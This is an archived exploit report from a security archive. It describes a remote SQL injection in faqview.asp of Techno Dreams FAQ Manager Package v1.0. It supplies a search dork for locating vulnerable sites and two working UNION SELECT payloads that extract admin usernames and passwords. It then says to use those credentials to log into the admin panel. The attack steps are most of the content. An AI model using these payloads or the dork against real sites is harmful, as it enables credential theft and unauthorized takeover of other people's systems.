TUCoPS :: HP Unsorted T :: b06-4776.htm

Techno Dreams FAQ Manager Package v1.0(faqview.asp) Remote SQL Injection Vulnerability
Techno Dreams FAQ Manager Package v1.0(faqview.asp) Remote SQL Injection Vulnerability
Techno Dreams FAQ Manager Package v1.0(faqview.asp) Remote SQL Injection Vulnerability



Vulnerability Report
*******************************************************************************
# Title  :  Techno Dreams FAQ Manager Package v1.0(faqview.asp) Remote SQL Injection Vulnerability

# Author :   ajann

# Dork :   faqview.asp?key

# Script Page : http://www.t-dreams.com

# Exploit;

*******************************************************************************

###http://[target]/[path]/faqview.asp?key=[SQL HERE]

Example:

//faqview.asp?key=-1%20union%20select%200,0,username,password,0%20from%20admin
//faqview.asp?key=-1%20union%20select%200,0,0,username,password,0%20from%20admin

With admin username and password take it,after join to login page: ../[path]/admin/

# ajann,Turkey
# ...
# Im not Hacker!

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH